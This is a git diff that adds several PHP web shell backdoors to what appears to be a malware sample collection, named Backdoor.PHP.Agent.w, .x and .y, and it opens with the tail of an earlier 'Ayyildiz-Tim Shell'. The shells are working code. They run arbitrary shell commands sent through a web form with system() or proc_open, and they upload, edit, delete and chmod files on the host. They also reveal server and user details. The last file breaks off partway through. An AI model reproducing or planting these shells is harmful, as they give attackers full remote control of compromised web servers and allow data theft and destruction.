color=#ffffff><FONT color=#ff0000> <FONT color=#ffffff> </font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff><FONT
|
||||||
|
color=#ff0000></DIV></DIV>
|
||||||
|
<DIV align=center></DIV>
|
||||||
|
<SCRIPT language=JavaScript>
|
||||||
|
|
||||||
|
<!--
|
||||||
|
function welle()
|
||||||
|
{
|
||||||
|
if(document.all.welle.filters[0].freq > 10)
|
||||||
|
document.all.welle.filters[0].freq = 5;
|
||||||
|
document.all.welle.filters[0].freq += 1;
|
||||||
|
if(document.all.welle.filters[0].phase > 100)
|
||||||
|
document.all.welle.filters[0].phase = 0;
|
||||||
|
document.all.welle.filters[0].phase += 10;
|
||||||
|
if(document.all.welle.filters[0].strength > 10)
|
||||||
|
document.all.welle.filters[0].strength = 1;
|
||||||
|
document.all.welle.filters[0].strength += 1;
|
||||||
|
window.setTimeout("welle()",100);
|
||||||
|
}
|
||||||
|
welle();
|
||||||
|
file://-->
|
||||||
|
</SCRIPT>
|
||||||
|
</FONT></TD></TR></TBODY></TABLE></DIV>
|
||||||
|
|
||||||
|
|
||||||
|
<?php
|
||||||
|
|
||||||
|
define('PHPSHELL_VERSION', '');
|
||||||
|
|
||||||
|
?>
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Ayyildiz-Tim Shell <?php echo PHPSHELL_VERSION ?></title>
|
||||||
|
<style type="text/css">
|
||||||
|
<!--
|
||||||
|
.style1 {color: #FF0000}
|
||||||
|
.style2 {
|
||||||
|
font-family: Tahoma;
|
||||||
|
font-size: 9px;
|
||||||
|
font-weight: bold;
|
||||||
|
}
|
||||||
|
-->
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<div align="center">
|
||||||
|
<table width="918" height="484" border="15">
|
||||||
|
<tr>
|
||||||
|
<td width="880"><h1 align="center" class="style1"><img src="http://www.ayyildiz.org/board/images/shine/misc/logo.jpg" width="880" height="200"></h1>
|
||||||
|
<div align="center"><span class="style1"><?php echo PHPSHELL_VERSION ?></span> <?php
|
||||||
|
|
||||||
|
if (ini_get('register_globals') != '1') {
|
||||||
|
/* We'll register the variables as globals: */
|
||||||
|
if (!empty($HTTP_POST_VARS))
|
||||||
|
extract($HTTP_POST_VARS);
|
||||||
|
|
||||||
|
if (!empty($HTTP_GET_VARS))
|
||||||
|
extract($HTTP_GET_VARS);
|
||||||
|
|
||||||
|
if (!empty($HTTP_SERVER_VARS))
|
||||||
|
extract($HTTP_SERVER_VARS);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* First we check if there has been asked for a working directory. */
|
||||||
|
if (!empty($work_dir)) {
|
||||||
|
/* A workdir has been asked for */
|
||||||
|
if (!empty($command)) {
|
||||||
|
if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
|
||||||
|
/* We try and match a cd command. */
|
||||||
|
if ($regs[1][0] == '/') {
|
||||||
|
$new_dir = $regs[1]; // 'cd /something/...'
|
||||||
|
} else {
|
||||||
|
$new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
|
||||||
|
}
|
||||||
|
if (file_exists($new_dir) && is_dir($new_dir)) {
|
||||||
|
$work_dir = $new_dir;
|
||||||
|
}
|
||||||
|
unset($command);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (file_exists($work_dir) && is_dir($work_dir)) {
|
||||||
|
/* We change directory to that dir: */
|
||||||
|
chdir($work_dir);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* We now update $work_dir to avoid things like '/foo/../bar': */
|
||||||
|
$work_dir = exec('pwd');
|
||||||
|
|
||||||
|
?>
|
||||||
|
</div>
|
||||||
|
<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
|
||||||
|
<p align="center"><strong>Bulundugunuz Dizin</strong>: <b>
|
||||||
|
<?php
|
||||||
|
|
||||||
|
$work_dir_splitted = explode('/', substr($work_dir, 1));
|
||||||
|
|
||||||
|
echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
|
||||||
|
|
||||||
|
if (!empty($work_dir_splitted[0])) {
|
||||||
|
$path = '';
|
||||||
|
for ($i = 0; $i < count($work_dir_splitted); $i++) {
|
||||||
|
$path .= '/' . $work_dir_splitted[$i];
|
||||||
|
printf('<a href="%s?work_dir=%s">%s</a>/',
|
||||||
|
$PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
?>
|
||||||
|
</b></p>
|
||||||
|
<p align="center"><strong>Dizin Degistir</strong> :
|
||||||
|
<select name="work_dir" onChange="this.form.submit()">
|
||||||
|
<?php
|
||||||
|
/* Now we make a list of the directories. */
|
||||||
|
$dir_handle = opendir($work_dir);
|
||||||
|
/* Run through all the files and directories to find the dirs. */
|
||||||
|
while ($dir = readdir($dir_handle)) {
|
||||||
|
if (is_dir($dir)) {
|
||||||
|
if ($dir == '.') {
|
||||||
|
echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
|
||||||
|
} elseif ($dir == '..') {
|
||||||
|
/* We have found the parent dir. We must be carefull if the parent
|
||||||
|
directory is the root directory (/). */
|
||||||
|
if (strlen($work_dir) == 1) {
|
||||||
|
/* work_dir is only 1 charecter - it can only be / There's no
|
||||||
|
parent directory then. */
|
||||||
|
} elseif (strrpos($work_dir, '/') == 0) {
|
||||||
|
/* The last / in work_dir were the first charecter.
|
||||||
|
This means that we have a top-level directory
|
||||||
|
eg. /bin or /home etc... */
|
||||||
|
echo "<option value=\"/\">Parent Directory</option>\n";
|
||||||
|
} else {
|
||||||
|
/* We do a little bit of string-manipulation to find the parent
|
||||||
|
directory... Trust me - it works :-) */
|
||||||
|
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
if ($work_dir == '/') {
|
||||||
|
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
|
||||||
|
} else {
|
||||||
|
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
closedir($dir_handle);
|
||||||
|
|
||||||
|
?>
|
||||||
|
</select>
|
||||||
|
</p>
|
||||||
|
<p align="center"><strong>Komut</strong>:
|
||||||
|
<input type="text" name="command" size="60">
|
||||||
|
<input name="submit_btn" type="submit" value="Komut Calistir">
|
||||||
|
</p>
|
||||||
|
<p align="center"><strong>Surekli Bagli Kal</strong>
|
||||||
|
<input type="checkbox" name="stderr">
|
||||||
|
</p>
|
||||||
|
|
||||||
|
<div align="center">
|
||||||
|
<textarea name="textarea" cols="80" rows="20" readonly>
|
||||||
|
|
||||||
|
<?php
|
||||||
|
if (!empty($command)) {
|
||||||
|
if ($stderr) {
|
||||||
|
$tmpfile = tempnam('/tmp', 'phpshell');
|
||||||
|
$command .= " 1> $tmpfile 2>&1; " .
|
||||||
|
"cat $tmpfile; rm $tmpfile";
|
||||||
|
} else if ($command == 'ls') {
|
||||||
|
/* ls looks much better with ' -F', IMHO. */
|
||||||
|
$command .= ' -F';
|
||||||
|
}
|
||||||
|
system($command);
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
|
||||||
|
</textarea>
|
||||||
|
</div>
|
||||||
|
</form>
|
||||||
|
<div align="center">
|
||||||
|
<script language="JavaScript" type="text/javascript">
|
||||||
|
document.forms[0].command.focus();
|
||||||
|
</script>
|
||||||
|
</div> <hr align="center"> <p align="center" class="style2">Copyright © 2006–2007, Powered byThehacker. v 2.1 - <a href="http|//www.ayyildiz.org" class="style1">www.ayyildiz.org</a> </p>
|
||||||
|
<p align="center" class="style2"> Ayyildiz TIM | AYT | TUM HAKLARI SAKLIDIR.</p>
|
||||||
|
<p align="center"><img src="http://ayyildiz.org/images/whosonline2.gif" width="60" height="45"> </p></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
</font></font></font></font></font></font></font></font></font></font></font>
|
||||||
|
</font>
|
||||||
|
|
||||||
|
|
||||||
|
<!--
|
||||||
|
/*
|
||||||
|
I Always Love Sha
|
||||||
|
*/
|
||||||
|
|
||||||
|
</BODY></HTML>
|
284
PHP/Backdoor.PHP.Agent.w
Normal file
284
PHP/Backdoor.PHP.Agent.w
Normal file
@ -0,0 +1,284 @@
|
|||||||
|
<?php
|
||||||
|
$default=$DOCUMENT_ROOT;
|
||||||
|
$this_file="./azrailphp.php";
|
||||||
|
|
||||||
|
if(isset($save)){
|
||||||
|
$fname=str_replace(" ","_",$fname);
|
||||||
|
$fname=str_replace("%20","_",$fname);
|
||||||
|
header("Cache-control: private");
|
||||||
|
header("Content-type: application/force-download");
|
||||||
|
header("Content-Length: ".filesize($save));
|
||||||
|
header("Content-Disposition: attachment; filename=$fname");
|
||||||
|
|
||||||
|
$fp = fopen($save, 'r');
|
||||||
|
fpassthru($fp);
|
||||||
|
fclose($fp);
|
||||||
|
unset($save);
|
||||||
|
exit;
|
||||||
|
}
|
||||||
|
|
||||||
|
if ( function_exists('ini_get') ) {
|
||||||
|
$onoff = ini_get('register_globals');
|
||||||
|
} else {
|
||||||
|
$onoff = get_cfg_var('register_globals');
|
||||||
|
}
|
||||||
|
if ($onoff != 1) {
|
||||||
|
@extract($_POST, EXTR_SKIP);
|
||||||
|
@extract($_GET, EXTR_SKIP);
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
function deltree($deldir) {
|
||||||
|
$mydir=@dir($deldir);
|
||||||
|
while($file=$mydir->read()) {
|
||||||
|
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
|
||||||
|
@chmod("$deldir/$file",0777);
|
||||||
|
deltree("$deldir/$file");
|
||||||
|
}
|
||||||
|
if (is_file("$deldir/$file")) {
|
||||||
|
@chmod("$deldir/$file",0777);
|
||||||
|
@unlink("$deldir/$file");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
$mydir->close();
|
||||||
|
@chmod("$deldir",0777);
|
||||||
|
echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SÝLÝNDÝ:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($op=='phpinfo'){
|
||||||
|
$fonk_kap = get_cfg_var("fonksiyonlarý_kapat");
|
||||||
|
echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu Çalýþmýyiii</center>";
|
||||||
|
exit;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
echo "<html>
|
||||||
|
<head>
|
||||||
|
<title>azrail 1.0 by C-W-M</title>
|
||||||
|
</head>
|
||||||
|
|
||||||
|
<body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
|
||||||
|
</body>";
|
||||||
|
|
||||||
|
echo "<center><font size='+3' color='#FF0000'><b> aZRaiLPhp v1.0!!!</b></font></center><br>
|
||||||
|
<center><font size='+2' color='#FFFFFF'>C-W-M</font><font size='+2' color='#FF0000'>HACKER</font><br>
|
||||||
|
<br>";
|
||||||
|
echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
|
||||||
|
echo "<br>
|
||||||
|
<br>";
|
||||||
|
|
||||||
|
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
|
||||||
|
echo "<div align=center>
|
||||||
|
<font size='+1' color='#0000FF'>Root Klasör: $DOCUMENT_ROOT</font><br>
|
||||||
|
<font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
|
||||||
|
|
||||||
|
if(!isset($dir)){
|
||||||
|
$dir="$default";
|
||||||
|
}
|
||||||
|
echo "<input type=text size=60 name=dir value='$dir'>
|
||||||
|
<input type=submit value='GIT'><br>
|
||||||
|
</form>
|
||||||
|
</div>";
|
||||||
|
|
||||||
|
if ($op=='up'){
|
||||||
|
$path=dir;
|
||||||
|
echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
|
||||||
|
if(isset($dosya_gonder)) {
|
||||||
|
|
||||||
|
if (copy ( $dosya_gonder, "$dir/$dosya_gonder_name" )){
|
||||||
|
echo "<center><font color='#0000FF'>Dosya Baþarýyla Gönderildi</font></center>";
|
||||||
|
}
|
||||||
|
} elseif(empty($dosya_gonder)) {
|
||||||
|
$path=$dir;
|
||||||
|
$dir = $dosya_dizin;
|
||||||
|
echo "$dir";
|
||||||
|
echo "<FORM ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
|
||||||
|
echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
|
||||||
|
|
||||||
|
echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
|
||||||
|
echo "</form>";
|
||||||
|
|
||||||
|
|
||||||
|
echo "</html>";
|
||||||
|
} else {
|
||||||
|
die ("<center><font color='#FF0000'>Dosya kopyalanamýyor!</font><center>");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if($op=='mf'){
|
||||||
|
$path=$dir;
|
||||||
|
if(isset($dismi) && isset($kodlar)){
|
||||||
|
$ydosya="$path/$dismi";
|
||||||
|
if(file_exists("$path/$dismi")){
|
||||||
|
$dos= "Böyle Bir Dosya Vardý Üzerine Yazýldý";
|
||||||
|
} else {
|
||||||
|
$dos = "Dosya Oluþturuldu";
|
||||||
|
}
|
||||||
|
touch ("$path/$dismi") or die("Dosya Oluþturulamýyor");
|
||||||
|
$ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açýlamýyor");
|
||||||
|
fwrite($ydosya2, $kodlar) or die("Dosyaya yazýlamýyor");
|
||||||
|
fclose($ydosya2);
|
||||||
|
echo "<center><font color='#0000FF'>$dos</font></center>";
|
||||||
|
} else {
|
||||||
|
|
||||||
|
echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
|
||||||
|
echo "<center>Dosya Ýsmi :<input type='text' name='dismi'></center><br>";
|
||||||
|
echo "<br>";
|
||||||
|
echo "<center>KODLAR</center><br>";
|
||||||
|
echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
|
||||||
|
echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
|
||||||
|
echo "</form>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if($op=='md'){
|
||||||
|
$path=$dir;
|
||||||
|
if(isset($kismi) && isset($okmf)){
|
||||||
|
$klasör="$path/$kismi";
|
||||||
|
mkdir("$klasör", 0777) or die ("<center><font color='#0000FF'>Klasör Oluþturulamýyor</font></center>");
|
||||||
|
echo "<center><font color='#0000FF'>Klasör Oluþturuldu</font></center>";
|
||||||
|
}
|
||||||
|
|
||||||
|
echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
|
||||||
|
echo "<center>Klasör Ýsmi :<input type='text' name='kismi'></center><br>";
|
||||||
|
echo "<br>";
|
||||||
|
echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
|
||||||
|
echo "</form>";
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
if($op=='del'){
|
||||||
|
unlink("$fname");
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
if($op=='dd'){
|
||||||
|
$dir=$here;
|
||||||
|
$deldirs=$yol;
|
||||||
|
if(!file_exists("$deldirs")) {
|
||||||
|
echo "<font color=\"#ff0000\">Dosya Yok</font>";
|
||||||
|
} else {
|
||||||
|
deltree($deldirs);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
if($op=='edit'){
|
||||||
|
$yol=$fname;
|
||||||
|
$yold=$path;
|
||||||
|
if (isset($ok)){
|
||||||
|
$dosya = fopen("$yol", 'w') or die("Dosya Açýlamýyor");
|
||||||
|
$metin=$tarea;
|
||||||
|
fwrite($dosya, $metin) or die("Yazýlamýyor!");
|
||||||
|
fclose($dosya);
|
||||||
|
echo "<center><font color='#0000FF'Dosya Baþarýyla Düzenlendi</font></center>";
|
||||||
|
} else {
|
||||||
|
$path=$dir;
|
||||||
|
echo "<center>DÜZENLE: $yol</center>";
|
||||||
|
$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Açýlamýyor</font></center>");
|
||||||
|
$boyut=filesize($yol);
|
||||||
|
$duzen = @fread ($dosya, $boyut);
|
||||||
|
echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
|
||||||
|
echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
|
||||||
|
echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
|
||||||
|
fclose($dosya);
|
||||||
|
$duzen=htmlspecialchars($duzen);
|
||||||
|
echo "</form>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if($op=='efp2'){
|
||||||
|
$fileperm=base_convert($_POST['fileperm'],8,10);
|
||||||
|
echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 ÝSÝMLÝ DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEÝÞTÝRÝLEMEDÝ!!</font>";
|
||||||
|
echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEÝÞTÝRÝLDÝ</font>";
|
||||||
|
}
|
||||||
|
|
||||||
|
if($op=='efp'){
|
||||||
|
$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
|
||||||
|
echo "<form method=post action=./$this_file?op=efp2>
|
||||||
|
<div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
|
||||||
|
<input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
|
||||||
|
<input name='dir' type='hidden' value='$yol'>
|
||||||
|
<input type='submit' value='TAMAM' class='input'></div><br>
|
||||||
|
</form>";
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
$path=$dir;
|
||||||
|
if(isset($dir)){
|
||||||
|
if ($dir = @opendir("$dir")) {
|
||||||
|
while (($file = readdir($dir)) !== false) {
|
||||||
|
if($file!="." && $file!=".."){
|
||||||
|
if(is_file("$path/$file")){
|
||||||
|
$disk_space=filesize("$path/$file");
|
||||||
|
$kb=$disk_space/1024;
|
||||||
|
$total_kb = number_format($kb, 2, '.', '');
|
||||||
|
$total_kb2="Kb";
|
||||||
|
|
||||||
|
|
||||||
|
echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
|
||||||
|
echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
|
||||||
|
@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
|
||||||
|
echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
|
||||||
|
echo "<br></div>\n";
|
||||||
|
}else{
|
||||||
|
echo "<div align=left><a href='./$this_file?dir=$path/$file'>GÝT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
|
||||||
|
$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
|
||||||
|
echo "<font color='#FFFF00'>$dirperm</font>";
|
||||||
|
echo " <br></div>\n";
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
closedir($dir);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasörüne Git</a></center>";
|
||||||
|
if(file_exists("B:\\")){
|
||||||
|
echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
|
||||||
|
} else {}
|
||||||
|
if(file_exists("C:\\")){
|
||||||
|
echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
|
||||||
|
} else {}
|
||||||
|
if (file_exists("D:\\")){
|
||||||
|
echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
|
||||||
|
} else {}
|
||||||
|
if (file_exists("E:\\")){
|
||||||
|
echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
|
||||||
|
} else {}
|
||||||
|
if (file_exists("F:\\")){
|
||||||
|
echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
|
||||||
|
} else {}
|
||||||
|
if (file_exists("G:\\")){
|
||||||
|
echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
|
||||||
|
} else {}
|
||||||
|
if (file_exists("H:\\")){
|
||||||
|
echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
|
||||||
|
} else {}
|
||||||
|
|
||||||
|
|
||||||
|
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
|
||||||
|
echo "<center><font size='+1' color='#FF0000'><b>SERVER BÝLGÝLERÝ</b></font><br></center>";
|
||||||
|
echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
|
||||||
|
echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
|
||||||
|
echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
|
||||||
|
echo "<br>";
|
||||||
|
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
|
||||||
|
echo "<center><font size='+1' color='#FF0000'><b>ÝÞLEMLER</b></font><br></center>";
|
||||||
|
echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
|
||||||
|
echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Oluþtur</a></font></center>";
|
||||||
|
echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasör Oluþtur</a></font></center>";
|
||||||
|
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
|
||||||
|
echo "<center>Tüm haklarý sahibi C-W-M'ye aittir</center><br>";
|
||||||
|
?>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
78
PHP/Backdoor.PHP.Agent.x
Normal file
78
PHP/Backdoor.PHP.Agent.x
Normal file
@ -0,0 +1,78 @@
|
|||||||
|
<title>h4ntu shell [powered by tsoi]</title>
|
||||||
|
<?php
|
||||||
|
echo "<p><font size=2 face=Verdana><b>This Is The Server Information</b></font></p>";
|
||||||
|
?>
|
||||||
|
|
||||||
|
<?php
|
||||||
|
closelog( );
|
||||||
|
$user = get_current_user( );
|
||||||
|
$login = posix_getuid( );
|
||||||
|
$euid = posix_geteuid( );
|
||||||
|
$ver = phpversion( );
|
||||||
|
$gid = posix_getgid( );
|
||||||
|
if ($chdir == "") $chdir = getcwd( );
|
||||||
|
if(!$whoami)$whoami=exec("whoami");
|
||||||
|
?>
|
||||||
|
<meta name="generator" content="Namo WebEditor v5.0">
|
||||||
|
<br>
|
||||||
|
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
|
||||||
|
<?php
|
||||||
|
$uname = posix_uname( );
|
||||||
|
while (list($info, $value) = each ($uname)) {
|
||||||
|
?>
|
||||||
|
<TR>
|
||||||
|
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?= $value ?></DIV></TD>
|
||||||
|
</TR>
|
||||||
|
<?php
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
<TR>
|
||||||
|
|
||||||
|
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</DIV></TD>
|
||||||
|
</TR>
|
||||||
|
<TR>
|
||||||
|
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Current Path:</b> <?= $chdir ?></DIV></TD>
|
||||||
|
|
||||||
|
</TR>
|
||||||
|
<TR>
|
||||||
|
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?></DIV></TD>
|
||||||
|
</TR>
|
||||||
|
<TR>
|
||||||
|
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
|
||||||
|
</TR>
|
||||||
|
|
||||||
|
<TR>
|
||||||
|
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Adress:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?></DIV></TD>
|
||||||
|
</TR>
|
||||||
|
<TR>
|
||||||
|
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Script Current User:</b> <?= $user ?></DIV></TD>
|
||||||
|
</TR>
|
||||||
|
<TR>
|
||||||
|
|
||||||
|
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>PHP Version:</b> <?= $ver ?></DIV></TD>
|
||||||
|
</TR>
|
||||||
|
</TABLE>
|
||||||
|
<BR>
|
||||||
|
|
||||||
|
<font face="courier new" size="2" color="777777"><b>#</b>php injection: <br>
|
||||||
|
</font><FORM name=injection METHOD=POST ACTION="<?php echo $_SERVER["REQUEST_URI"];?>">
|
||||||
|
<font face="courier new" size="2" color="777777">cmd :
|
||||||
|
<INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($_POST['cmd'])); ?>" size="161">
|
||||||
|
<br>
|
||||||
|
<INPUT TYPE="submit">
|
||||||
|
</font></FORM>
|
||||||
|
|
||||||
|
<hr color=777777 width=100% height=115px>
|
||||||
|
|
||||||
|
<pre>
|
||||||
|
<?
|
||||||
|
$cmd = $_POST['cmd'];
|
||||||
|
if (isset($chdir)) @chdir($chdir);
|
||||||
|
ob_start();
|
||||||
|
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
|
||||||
|
$output = ob_get_contents();
|
||||||
|
ob_end_clean();
|
||||||
|
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
|
||||||
|
exit;
|
||||||
|
?>
|
||||||
|
</pre>
|
187
PHP/Backdoor.PHP.Agent.y
Normal file
187
PHP/Backdoor.PHP.Agent.y
Normal file
@ -0,0 +1,187 @@
|
|||||||
|
<?php
|
||||||
|
|
||||||
|
/*Emperor Hacking TEAM */
|
||||||
|
session_start();
|
||||||
|
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
|
||||||
|
$_SESSION['cwd'] = getcwd();
|
||||||
|
$_SESSION['history'] = array();
|
||||||
|
$_SESSION['output'] = '';
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!empty($_REQUEST['command'])) {
|
||||||
|
if (get_magic_quotes_gpc()) {
|
||||||
|
$_REQUEST['command'] = stripslashes($_REQUEST['command']);
|
||||||
|
}
|
||||||
|
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
|
||||||
|
unset($_SESSION['history'][$i]);
|
||||||
|
|
||||||
|
array_unshift($_SESSION['history'], $_REQUEST['command']);
|
||||||
|
|
||||||
|
$_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
|
||||||
|
|
||||||
|
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
|
||||||
|
$_SESSION['cwd'] = dirname(__FILE__);
|
||||||
|
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
|
||||||
|
|
||||||
|
if ($regs[1][0] == '/') {
|
||||||
|
|
||||||
|
$new_dir = $regs[1];
|
||||||
|
} else {
|
||||||
|
|
||||||
|
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
while (strpos($new_dir, '/./') !== false)
|
||||||
|
$new_dir = str_replace('/./', '/', $new_dir);
|
||||||
|
|
||||||
|
|
||||||
|
while (strpos($new_dir, '//') !== false)
|
||||||
|
$new_dir = str_replace('//', '/', $new_dir);
|
||||||
|
|
||||||
|
while (preg_match('|/\.\.(?!\.)|', $new_dir))
|
||||||
|
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
|
||||||
|
|
||||||
|
if ($new_dir == '') $new_dir = '/';
|
||||||
|
|
||||||
|
|
||||||
|
if (@chdir($new_dir)) {
|
||||||
|
$_SESSION['cwd'] = $new_dir;
|
||||||
|
} else {
|
||||||
|
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
|
||||||
|
}
|
||||||
|
|
||||||
|
} else {
|
||||||
|
|
||||||
|
chdir($_SESSION['cwd']);
|
||||||
|
|
||||||
|
$length = strcspn($_REQUEST['command'], " \t");
|
||||||
|
$token = substr($_REQUEST['command'], 0, $length);
|
||||||
|
if (isset($aliases[$token]))
|
||||||
|
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
|
||||||
|
|
||||||
|
$p = proc_open($_REQUEST['command'],
|
||||||
|
array(1 => array('pipe', 'w'),
|
||||||
|
